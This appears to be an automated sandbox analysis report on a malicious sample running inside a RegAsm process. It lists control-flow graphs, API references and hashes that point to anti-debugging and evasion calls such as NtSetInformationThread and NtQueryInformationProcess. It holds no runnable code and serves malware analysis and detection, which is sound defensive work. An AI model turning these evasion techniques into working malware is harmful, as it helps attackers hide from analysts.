c31864 call c37d70 call c317bf 712->718 719 c311af-c311b9 712->719 714 c310f4-c310fe call c33189 713->714 736 c31100-c31104 714->736 715->697 721 c3106f-c31072 715->721 718->591 753 c31149-c3114d 718->753 719->591 725 c311bf-c311c4 719->725 721->665 721->686 723->649 729 c33832 723->729 724->649 730 c33841-c3388e call c38314 724->730 731 c311c6-c311ca 725->731 732 c311de-c311eb 725->732 729->724 730->649 747 c33894-c33919 call c3452b call c338d6 730->747 733 c311d9 call c31d3f 731->733 734 c311cc-c311d7 call c31864 731->734 732->613 737 c35a43-c35a52 call c311f0 732->737 733->732 734->732 734->733 736->613 749 c35a56 737->749 750 c35abf-c35ac6 call c352b9 737->750 747->649 777 c3391f-c33957 call c39eee 747->777 754 c35a58-c35a7f 749->754 755 c35abd-c35abe 749->755 762 c35b31-c35f1a 750->762 763 c35ac8-c35ae3 750->763 753->719 759 c3114f-c311ae call c3949d call c31719 call c31dbc 753->759 765 c35a82-c35aac 754->765 766 c35ae7-c35aee 754->766 755->750 759->719 769 c35ae4 763->769 765->769 778 c35aae-c35ac6 call c35200 765->778 771 c35af0-c35b1e 766->771 772 c35b1f-c35b2c 766->772 769->766 771->772 772->762 777->649 785 c3395d-c33d99 call c39eee 777->785 778->762 778->763 785->649 790 c33d9b-c33dd3 call c39eee * 2 785->790
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T
                                  • API String ID: 4046476035-3147410236
                                  • Opcode ID: be423587d4f69cb26d68848b99c0aff552a16ecf015ed77986f47de5f307b8fb
                                  • Instruction ID: 8725311e67224f41c09769ce1c7c7548cefe4f3dc66020448b966db7601fd2c4
                                  • Opcode Fuzzy Hash: be423587d4f69cb26d68848b99c0aff552a16ecf015ed77986f47de5f307b8fb
                                  • Instruction Fuzzy Hash: F2918C70B60305AFEF346EA48CE2BDE3752AF42750F680116FD559B1C1CF75C98A9A12
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Function 00C31719, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 290nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 795 c31719-c3176f call c39eee * 2 800 c31775-c317ba call c39eee * 2 795->800 801 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 795->801 811 c340a3-c34108 call c39eee 800->811 826 c30aeb-c30b00 801->826 827 c30b06-c30b2c call c38314 826->827 828 c33189-c331e1 call c33e58 826->828 827->826 833 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 827->833 834 c331e6-c335ed 828->834 835 c331e1 call c33e58 828->835 865 c30b8b-c30bf3 call c381cf call c39eee 833->865 866 c31078-c310d8 call c381cf * 2 call c39eee 833->866 838 c335f3-c33620 call c39eee 834->838 839 c3452b-c34534 834->839 835->834 850 c33df6-c33e51 call c39eee * 4 838->850 851 c33626-c33726 call c33fdf call c37d70 call c39eee 838->851 841 c34535-c3454c 839->841 841->841 844 c3454e-c345a2 841->844 851->850 877 c3372c-c33767 call c39eee 851->877 865->866 884 c30bf9-c30c05 865->884 898 c38a84-c38f11 call c38799 call c38ab5 866->898 899 c310de-c310e8 call c37ce8 866->899 877->850 886 c3376d-c337cc call c39eee 877->886 887 c30c0b-c30c2a call c382c4 884->887 886->850 895 c337d2-c337d7 886->895 896 c30c51-c30c56 887->896 897 c30c2c-c30c35 887->897 895->850 901 c337dd-c33825 call c337f9 895->901 896->898 904 c30c5c-c31053 896->904 897->898 902 c30c3b-c30c40 897->902 913 c3110b-c31111 899->913 914 c310ea 899->914 924 c33827-c3382c 901->924 925 c33834-c33840 901->925 902->898 907 c30c46-c30c4b 902->907 904->898 910 c31059-c3105e 904->910 907->896 907->898 910->898 916 c31064-c31069 910->916 919 c31117-c31143 call c31864 call c37d70 call c317bf 913->919 920 c311af-c311b9 913->920 915 c310f4-c310fe call c33189 914->915 937 c31100-c31104 915->937 916->898 922 c3106f-c31072 916->922 919->801 954 c31149-c3114d 919->954 920->801 926 c311bf-c311c4 920->926 922->866 922->887 924->850 930 c33832 924->930 925->850 931 c33841-c3388e call c38314 925->931 932 c311c6-c311ca 926->932 933 c311de-c311eb 926->933 930->925 931->850 948 c33894-c33919 call c3452b call c338d6 931->948 934 c311d9 call c31d3f 932->934 935 c311cc-c311d7 call c31864 932->935 933->811 938 c35a43-c35a52 call c311f0 933->938 934->933 935->933 935->934 937->811 950 c35a56 938->950 951 c35abf-c35ac6 call c352b9 938->951 948->850 978 c3391f-c33957 call c39eee 948->978 955 c35a58-c35a7f 950->955 956 c35abd-c35abe 950->956 963 c35b31-c35f1a 951->963 964 c35ac8-c35ae3 951->964 954->920 960 c3114f-c311ae call c3949d call c31719 call c31dbc 954->960 966 c35a82-c35aac 955->966 967 c35ae7-c35aee 955->967 956->951 960->920 970 c35ae4 964->970 966->970 979 c35aae-c35ac6 call c35200 966->979 972 c35af0-c35b1e 967->972 973 c35b1f-c35b2c 967->973 970->967 972->973 973->963 978->850 986 c3395d-c33d99 call c39eee 978->986 979->963 979->964 986->850 991 c33d9b-c33dd3 call c39eee * 2 986->991
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T
                                  • API String ID: 4046476035-3147410236
                                  • Opcode ID: ae82644baae1b2402e6816c366610ef02a75366e36d6af6e31ebde68cc31dee5
                                  • Instruction ID: 9d6896cad66a5ddd1f342968c2ff863b879b01875dcb12f6df0cc32e24cee477
                                  • Opcode Fuzzy Hash: ae82644baae1b2402e6816c366610ef02a75366e36d6af6e31ebde68cc31dee5
                                  • Instruction Fuzzy Hash: 1C919B30B60305AFFF306E649C96BDE3652AF82750F68012AFD44AB1C1CFB5DD8A9611
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Function 00C30629, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 234nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 996 c30629 997 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 996->997 1014 c30aeb-c30b00 997->1014 1015 c30b06-c30b2c call c38314 1014->1015 1016 c33189-c331e1 call c33e58 1014->1016 1015->1014 1021 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 1015->1021 1022 c331e6-c335ed 1016->1022 1023 c331e1 call c33e58 1016->1023 1053 c30b8b-c30bf3 call c381cf call c39eee 1021->1053 1054 c31078-c310d8 call c381cf * 2 call c39eee 1021->1054 1026 c335f3-c33620 call c39eee 1022->1026 1027 c3452b-c34534 1022->1027 1023->1022 1038 c33df6-c33e51 call c39eee * 4 1026->1038 1039 c33626-c33726 call c33fdf call c37d70 call c39eee 1026->1039 1029 c34535-c3454c 1027->1029 1029->1029 1032 c3454e-c345a2 1029->1032 1039->1038 1065 c3372c-c33767 call c39eee 1039->1065 1053->1054 1072 c30bf9-c30c05 1053->1072 1086 c38a84-c38f11 call c38799 call c38ab5 1054->1086 1087 c310de-c310e8 call c37ce8 1054->1087 1065->1038 1074 c3376d-c337cc call c39eee 1065->1074 1075 c30c0b-c30c2a call c382c4 1072->1075 1074->1038 1083 c337d2-c337d7 1074->1083 1084 c30c51-c30c56 1075->1084 1085 c30c2c-c30c35 1075->1085 1083->1038 1089 c337dd-c33825 call c337f9 1083->1089 1084->1086 1092 c30c5c-c31053 1084->1092 1085->1086 1090 c30c3b-c30c40 1085->1090 1101 c3110b-c31111 1087->1101 1102 c310ea 1087->1102 1112 c33827-c3382c 1089->1112 1113 c33834-c33840 1089->1113 1090->1086 1095 c30c46-c30c4b 1090->1095 1092->1086 1098 c31059-c3105e 1092->1098 1095->1084 1095->1086 1098->1086 1104 c31064-c31069 1098->1104 1107 c31117-c31143 call c31864 call c37d70 call c317bf 1101->1107 1108 c311af-c311b9 1101->1108 1103 c310f4-c310fe call c33189 1102->1103 1125 c31100-c31104 1103->1125 1104->1086 1110 c3106f-c31072 1104->1110 1107->997 1146 c31149-c3114d 1107->1146 1108->997 1114 c311bf-c311c4 1108->1114 1110->1054 1110->1075 1112->1038 1118 c33832 1112->1118 1113->1038 1119 c33841-c3388e call c38314 1113->1119 1120 c311c6-c311ca 1114->1120 1121 c311de-c311eb 1114->1121 1118->1113 1119->1038 1139 c33894-c33919 call c3452b call c338d6 1119->1139 1122 c311d9 call c31d3f 1120->1122 1123 c311cc-c311d7 call c31864 1120->1123 1126 c35a43-c35a52 call c311f0 1121->1126 1127 c340a3-c34108 call c39eee 1121->1127 1122->1121 1123->1121 1123->1122 1125->1127 1142 c35a56 1126->1142 1143 c35abf-c35ac6 call c352b9 1126->1143 1139->1038 1170 c3391f-c33957 call c39eee 1139->1170 1147 c35a58-c35a7f 1142->1147 1148 c35abd-c35abe 1142->1148 1155 c35b31-c35f1a 1143->1155 1156 c35ac8-c35ae3 1143->1156 1146->1108 1152 c3114f-c311ae call c3949d call c31719 call c31dbc 1146->1152 1158 c35a82-c35aac 1147->1158 1159 c35ae7-c35aee 1147->1159 1148->1143 1152->1108 1162 c35ae4 1156->1162 1158->1162 1171 c35aae-c35ac6 call c35200 1158->1171 1164 c35af0-c35b1e 1159->1164 1165 c35b1f-c35b2c 1159->1165 1162->1159 1164->1165 1165->1155 1170->1038 1178 c3395d-c33d99 call c39eee 1170->1178 1171->1155 1171->1156 1178->1038 1183 c33d9b-c33dd3 call c39eee * 2 1178->1183
                                  APIs
                                    • Part of subcall function 00C381CF: LoadLibraryA.KERNEL32(?,B769339E,?,00C30A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3822B
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 26056ae46e39905a1e3d51aefb313d98131d031c7a56edcbf01291416ea960fa
                                  • Instruction ID: 60f95ca0ca26b6c9d97d37373684535416c1673de6e1592d637491a9739d5120
                                  • Opcode Fuzzy Hash: 26056ae46e39905a1e3d51aefb313d98131d031c7a56edcbf01291416ea960fa
                                  • Instruction Fuzzy Hash: C661CE70B60305AFFF346E649CE2BDE2652AF42750F68012AFC45971C1CFB4C98E9612
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Function 00C30A7A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1188 c30a7a-c30a7c 1189 c30a87-c30ae6 call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 1188->1189 1190 c30a7e-c30a82 1188->1190 1199 c30aeb-c30b00 1189->1199 1190->1189 1200 c30b06-c30b2c call c38314 1199->1200 1201 c33189-c331e1 call c33e58 1199->1201 1200->1199 1206 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 1200->1206 1207 c331e6-c335ed 1201->1207 1208 c331e1 call c33e58 1201->1208 1238 c30b8b-c30bf3 call c381cf call c39eee 1206->1238 1239 c31078-c310d8 call c381cf * 2 call c39eee 1206->1239 1211 c335f3-c33620 call c39eee 1207->1211 1212 c3452b-c34534 1207->1212 1208->1207 1223 c33df6-c33e51 call c39eee * 4 1211->1223 1224 c33626-c33726 call c33fdf call c37d70 call c39eee 1211->1224 1214 c34535-c3454c 1212->1214 1214->1214 1217 c3454e-c345a2 1214->1217 1224->1223 1250 c3372c-c33767 call c39eee 1224->1250 1238->1239 1257 c30bf9-c30c05 1238->1257 1271 c38a84-c38f11 call c38799 call c38ab5 1239->1271 1272 c310de-c310e8 call c37ce8 1239->1272 1250->1223 1259 c3376d-c337cc call c39eee 1250->1259 1260 c30c0b-c30c2a call c382c4 1257->1260 1259->1223 1268 c337d2-c337d7 1259->1268 1269 c30c51-c30c56 1260->1269 1270 c30c2c-c30c35 1260->1270 1268->1223 1274 c337dd-c33825 call c337f9 1268->1274 1269->1271 1277 c30c5c-c31053 1269->1277 1270->1271 1275 c30c3b-c30c40 1270->1275 1286 c3110b-c31111 1272->1286 1287 c310ea 1272->1287 1297 c33827-c3382c 1274->1297 1298 c33834-c33840 1274->1298 1275->1271 1280 c30c46-c30c4b 1275->1280 1277->1271 1283 c31059-c3105e 1277->1283 1280->1269 1280->1271 1283->1271 1289 c31064-c31069 1283->1289 1292 c31117-c31143 call c31864 call c37d70 call c317bf 1286->1292 1293 c311af-c311b9 1286->1293 1288 c310f4-c310fe call c33189 1287->1288 1312 c31100-c31104 1288->1312 1289->1271 1295 c3106f-c31072 1289->1295 1300 c3062c-c30a69 call c381cf * 2 call c345aa 1292->1300 1337 c31149-c3114d 1292->1337 1299 c311bf-c311c4 1293->1299 1293->1300 1295->1239 1295->1260 1297->1223 1305 c33832 1297->1305 1298->1223 1306 c33841-c3388e call c38314 1298->1306 1307 c311c6-c311ca 1299->1307 1308 c311de-c311eb 1299->1308 1300->1189 1305->1298 1306->1223 1329 c33894-c33919 call c3452b call c338d6 1306->1329 1309 c311d9 call c31d3f 1307->1309 1310 c311cc-c311d7 call c31864 1307->1310 1314 c35a43-c35a52 call c311f0 1308->1314 1315 c340a3-c34108 call c39eee 1308->1315 1309->1308 1310->1308 1310->1309 1312->1315 1333 c35a56 1314->1333 1334 c35abf-c35ac6 call c352b9 1314->1334 1329->1223 1363 c3391f-c33957 call c39eee 1329->1363 1339 c35a58-c35a7f 1333->1339 1340 c35abd-c35abe 1333->1340 1348 c35b31-c35f1a 1334->1348 1349 c35ac8-c35ae3 1334->1349 1337->1293 1344 c3114f-c311ae call c3949d call c31719 call c31dbc 1337->1344 1351 c35a82-c35aac 1339->1351 1352 c35ae7-c35aee 1339->1352 1340->1334 1344->1293 1355 c35ae4 1349->1355 1351->1355 1364 c35aae-c35ac6 call c35200 1351->1364 1357 c35af0-c35b1e 1352->1357 1358 c35b1f-c35b2c 1352->1358 1355->1352 1357->1358 1358->1348 1363->1223 1371 c3395d-c33d99 call c39eee 1363->1371 1364->1348 1364->1349 1371->1223 1376 c33d9b-c33dd3 call c39eee * 2 1371->1376
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                    • Part of subcall function 00C381CF: LoadLibraryA.KERNEL32(?,B769339E,?,00C30A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3822B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 4d18b91f56fdd8792a63588e8d1d224e2a450ae394e87829301782603fa06be9
                                  • Instruction ID: 80d84bc7e909577d50205b818e3f5e829037a9c2ad6fa7ac0efbcba7f2ed47ab
                                  • Opcode Fuzzy Hash: 4d18b91f56fdd8792a63588e8d1d224e2a450ae394e87829301782603fa06be9
                                  • Instruction Fuzzy Hash: 4551BA30B60305AFFF3429649CE6BDE2712AF42750F68012AFD549B1C1CFB4D98E9612
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Function 00C39EF3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1381 c39ef3-c39ef7 1382 c39ef8-c39f07 1381->1382 1382->1382 1383 c39f09-c3a709 call c38fc5 1382->1383 1388 c3a709 1383->1388 1389 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 1383->1389 1388->1389 1391 c3a70f-c3a715 1388->1391 1423 c30aeb-c30b00 1389->1423 1392 c3a71a-c3a721 1391->1392 1392->1392 1394 c3a723-c3a736 1392->1394 1396 c3a73b-c3a743 1394->1396 1396->1396 1398 c3a745-c3a769 1396->1398 1403 c3a7f4-c3a803 1398->1403 1404 c3a76f-c3a779 1398->1404 1404->1403 1406 c3a77b-c3a77f 1404->1406 1406->1403 1408 c3a781-c3a787 1406->1408 1408->1403 1410 c3a789-c3a78d 1408->1410 1410->1403 1412 c3a78f-c3a793 1410->1412 1412->1403 1414 c3a795-c3a799 1412->1414 1414->1403 1416 c3a79b-c3a7ab 1414->1416 1416->1389 1419 c3a7b1-c3a7bf 1416->1419 1419->1403 1420 c3a7c1-c3a7c9 1419->1420 1420->1403 1422 c3a7cb-c3a7d6 1420->1422 1422->1403 1424 c3a7d8-c3a7dd NtQueryInformationProcess 1422->1424 1425 c30b06-c30b2c call c38314 1423->1425 1426 c33189-c331e1 call c33e58 1423->1426 1429 c3a7e0-c3a7e8 1424->1429 1425->1423 1433 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 1425->1433 1434 c331e6-c335ed 1426->1434 1435 c331e1 call c33e58 1426->1435 1429->1429 1432 c3a7ea-c3a825 1429->1432 1442 c3a827 1432->1442 1443 c3a7cf-c3a7d6 1432->1443 1468 c30b8b-c30bf3 call c381cf call c39eee 1433->1468 1469 c31078-c310d8 call c381cf * 2 call c39eee 1433->1469 1439 c335f3-c33620 call c39eee 1434->1439 1440 c3452b-c34534 1434->1440 1435->1434 1453 c33df6-c33e51 call c39eee * 4 1439->1453 1454 c33626-c33726 call c33fdf call c37d70 call c39eee 1439->1454 1444 c34535-c3454c 1440->1444 1442->1442 1443->1403 1443->1424 1444->1444 1447 c3454e-c345a2 1444->1447 1454->1453 1480 c3372c-c33767 call c39eee 1454->1480 1468->1469 1487 c30bf9-c30c05 1468->1487 1501 c38a84-c38f11 call c38799 call c38ab5 1469->1501 1502 c310de-c310e8 call c37ce8 1469->1502 1480->1453 1489 c3376d-c337cc call c39eee 1480->1489 1490 c30c0b-c30c2a call c382c4 1487->1490 1489->1453 1498 c337d2-c337d7 1489->1498 1499 c30c51-c30c56 1490->1499 1500 c30c2c-c30c35 1490->1500 1498->1453 1504 c337dd-c33825 call c337f9 1498->1504 1499->1501 1507 c30c5c-c31053 1499->1507 1500->1501 1505 c30c3b-c30c40 1500->1505 1516 c3110b-c31111 1502->1516 1517 c310ea 1502->1517 1527 c33827-c3382c 1504->1527 1528 c33834-c33840 1504->1528 1505->1501 1510 c30c46-c30c4b 1505->1510 1507->1501 1513 c31059-c3105e 1507->1513 1510->1499 1510->1501 1513->1501 1519 c31064-c31069 1513->1519 1522 c31117-c31143 call c31864 call c37d70 call c317bf 1516->1522 1523 c311af-c311b9 1516->1523 1518 c310f4-c310fe call c33189 1517->1518 1540 c31100-c31104 1518->1540 1519->1501 1525 c3106f-c31072 1519->1525 1522->1389 1561 c31149-c3114d 1522->1561 1523->1389 1529 c311bf-c311c4 1523->1529 1525->1469 1525->1490 1527->1453 1533 c33832 1527->1533 1528->1453 1534 c33841-c3388e call c38314 1528->1534 1535 c311c6-c311ca 1529->1535 1536 c311de-c311eb 1529->1536 1533->1528 1534->1453 1554 c33894-c33919 call c3452b call c338d6 1534->1554 1537 c311d9 call c31d3f 1535->1537 1538 c311cc-c311d7 call c31864 1535->1538 1541 c35a43-c35a52 call c311f0 1536->1541 1542 c340a3-c34108 call c39eee 1536->1542 1537->1536 1538->1536 1538->1537 1540->1542 1557 c35a56 1541->1557 1558 c35abf-c35ac6 call c352b9 1541->1558 1554->1453 1585 c3391f-c33957 call c39eee 1554->1585 1562 c35a58-c35a7f 1557->1562 1563 c35abd-c35abe 1557->1563 1570 c35b31-c35f1a 1558->1570 1571 c35ac8-c35ae3 1558->1571 1561->1523 1567 c3114f-c311ae call c3949d call c31719 call c31dbc 1561->1567 1573 c35a82-c35aac 1562->1573 1574 c35ae7-c35aee 1562->1574 1563->1558 1567->1523 1577 c35ae4 1571->1577 1573->1577 1586 c35aae-c35ac6 call c35200 1573->1586 1579 c35af0-c35b1e 1574->1579 1580 c35b1f-c35b2c 1574->1580 1577->1574 1579->1580 1580->1570 1585->1453 1593 c3395d-c33d99 call c39eee 1585->1593 1586->1570 1586->1571 1593->1453 1598 c33d9b-c33dd3 call c39eee * 2 1593->1598
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1.!T
                                  • API String ID: 0-3147410236
                                  • Opcode ID: 3354b6e6c4ee9e5599cef383cbfd7b4a2cffadf4d1ffec653b6aa3ce2308c8d6
                                  • Instruction ID: 9089e07874a17f2e4cb0ada4272eb7746d856d2d8deca8d740abf0b2a6092e37
                                  • Opcode Fuzzy Hash: 3354b6e6c4ee9e5599cef383cbfd7b4a2cffadf4d1ffec653b6aa3ce2308c8d6
                                  • Instruction Fuzzy Hash: 83216B75B60305AFEF30BEA48D62BDD35D29F88760F704126FE416B2C4DA78D8825B05
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C32A91, Relevance: 3.1, APIs: 2, Instructions: 106sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1603 c32a91-c32aa2 1604 c32aa5-c32aad 1603->1604 1604->1604 1605 c32aaf-c32b00 GetPEB call c39eee 1604->1605 1608 c32b06-c32b38 call c39eee Sleep 1605->1608 1609 c32a7c-c32a8a 1605->1609 1615 c32f6b-c32f82 TerminateThread 1608->1615 1616 c32b3e-c32b45 1608->1616 1610 c3a80b 1609->1610 1612 c3a810 1610->1612 1613 c3a80b call c32a91 1610->1613 1617 c3a815 1612->1617 1613->1612 1618 c34bb7 call c32b4a 1615->1618 1616->1618 1617->1617 1620 c34bbc-c34bcc call c38fc5 call c345aa 1618->1620 1625 c34bdb-c34c26 call c345aa 1620->1625 1626 c34bce-c34bd3 1620->1626 1625->1610 1625->1620 1626->1620
                                  APIs
                                  • Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000A810,00000000,00000000,00000000), ref: 00C32B2E
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: cb8104912665ef0133ece89a500bfd49e73c1bea20618522217c05156157e0d2
                                  • Instruction ID: 023fc180cb9d414c7f497662cf52a9f59def010dbef91e55b097315632a76d31
                                  • Opcode Fuzzy Hash: cb8104912665ef0133ece89a500bfd49e73c1bea20618522217c05156157e0d2
                                  • Instruction Fuzzy Hash: 8F310070614701AFFB28AE68CD59BE8B3A2AF057A4F544258FD519B1D2D7B1D880CA11
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C39F12, Relevance: 1.8, APIs: 1, Instructions: 335nativethreadUNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1689 c39f12-c3a709 call c38fc5 1694 c3a709 1689->1694 1695 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 1689->1695 1694->1695 1697 c3a70f-c3a715 1694->1697 1729 c30aeb-c30b00 1695->1729 1698 c3a71a-c3a721 1697->1698 1698->1698 1700 c3a723-c3a736 1698->1700 1702 c3a73b-c3a743 1700->1702 1702->1702 1704 c3a745-c3a769 1702->1704 1709 c3a7f4-c3a803 1704->1709 1710 c3a76f-c3a779 1704->1710 1710->1709 1712 c3a77b-c3a77f 1710->1712 1712->1709 1714 c3a781-c3a787 1712->1714 1714->1709 1716 c3a789-c3a78d 1714->1716 1716->1709 1718 c3a78f-c3a793 1716->1718 1718->1709 1720 c3a795-c3a799 1718->1720 1720->1709 1722 c3a79b-c3a7ab 1720->1722 1722->1695 1725 c3a7b1-c3a7bf 1722->1725 1725->1709 1726 c3a7c1-c3a7c9 1725->1726 1726->1709 1728 c3a7cb-c3a7d6 1726->1728 1728->1709 1730 c3a7d8-c3a7dd NtQueryInformationProcess 1728->1730 1731 c30b06-c30b2c call c38314 1729->1731 1732 c33189-c331e1 call c33e58 1729->1732 1735 c3a7e0-c3a7e8 1730->1735 1731->1729 1739 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 1731->1739 1740 c331e6-c335ed 1732->1740 1741 c331e1 call c33e58 1732->1741 1735->1735 1738 c3a7ea-c3a825 1735->1738 1748 c3a827 1738->1748 1749 c3a7cf-c3a7d6 1738->1749 1774 c30b8b-c30bf3 call c381cf call c39eee 1739->1774 1775 c31078-c310d8 call c381cf * 2 call c39eee 1739->1775 1745 c335f3-c33620 call c39eee 1740->1745 1746 c3452b-c34534 1740->1746 1741->1740 1759 c33df6-c33e51 call c39eee * 4 1745->1759 1760 c33626-c33726 call c33fdf call c37d70 call c39eee 1745->1760 1750 c34535-c3454c 1746->1750 1748->1748 1749->1709 1749->1730 1750->1750 1753 c3454e-c345a2 1750->1753 1760->1759 1786 c3372c-c33767 call c39eee 1760->1786 1774->1775 1793 c30bf9-c30c05 1774->1793 1807 c38a84-c38f11 call c38799 call c38ab5 1775->1807 1808 c310de-c310e8 call c37ce8 1775->1808 1786->1759 1795 c3376d-c337cc call c39eee 1786->1795 1796 c30c0b-c30c2a call c382c4 1793->1796 1795->1759 1804 c337d2-c337d7 1795->1804 1805 c30c51-c30c56 1796->1805 1806 c30c2c-c30c35 1796->1806 1804->1759 1810 c337dd-c33825 call c337f9 1804->1810 1805->1807 1813 c30c5c-c31053 1805->1813 1806->1807 1811 c30c3b-c30c40 1806->1811 1822 c3110b-c31111 1808->1822 1823 c310ea 1808->1823 1833 c33827-c3382c 1810->1833 1834 c33834-c33840 1810->1834 1811->1807 1816 c30c46-c30c4b 1811->1816 1813->1807 1819 c31059-c3105e 1813->1819 1816->1805 1816->1807 1819->1807 1825 c31064-c31069 1819->1825 1828 c31117-c31143 call c31864 call c37d70 call c317bf 1822->1828 1829 c311af-c311b9 1822->1829 1824 c310f4-c310fe call c33189 1823->1824 1846 c31100-c31104 1824->1846 1825->1807 1831 c3106f-c31072 1825->1831 1828->1695 1867 c31149-c3114d 1828->1867 1829->1695 1835 c311bf-c311c4 1829->1835 1831->1775 1831->1796 1833->1759 1839 c33832 1833->1839 1834->1759 1840 c33841-c3388e call c38314 1834->1840 1841 c311c6-c311ca 1835->1841 1842 c311de-c311eb 1835->1842 1839->1834 1840->1759 1860 c33894-c33919 call c3452b call c338d6 1840->1860 1843 c311d9 call c31d3f 1841->1843 1844 c311cc-c311d7 call c31864 1841->1844 1847 c35a43-c35a52 call c311f0 1842->1847 1848 c340a3-c34108 call c39eee 1842->1848 1843->1842 1844->1842 1844->1843 1846->1848 1863 c35a56 1847->1863 1864 c35abf-c35ac6 call c352b9 1847->1864 1860->1759 1891 c3391f-c33957 call c39eee 1860->1891 1868 c35a58-c35a7f 1863->1868 1869 c35abd-c35abe 1863->1869 1876 c35b31-c35f1a 1864->1876 1877 c35ac8-c35ae3 1864->1877 1867->1829 1873 c3114f-c311ae call c3949d call c31719 call c31dbc 1867->1873 1879 c35a82-c35aac 1868->1879 1880 c35ae7-c35aee 1868->1880 1869->1864 1873->1829 1883 c35ae4 1877->1883 1879->1883 1892 c35aae-c35ac6 call c35200 1879->1892 1885 c35af0-c35b1e 1880->1885 1886 c35b1f-c35b2c 1880->1886 1883->1880 1885->1886 1886->1876 1891->1759 1899 c3395d-c33d99 call c39eee 1891->1899 1892->1876 1892->1877 1899->1759 1904 c33d9b-c33dd3 call c39eee * 2 1899->1904
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
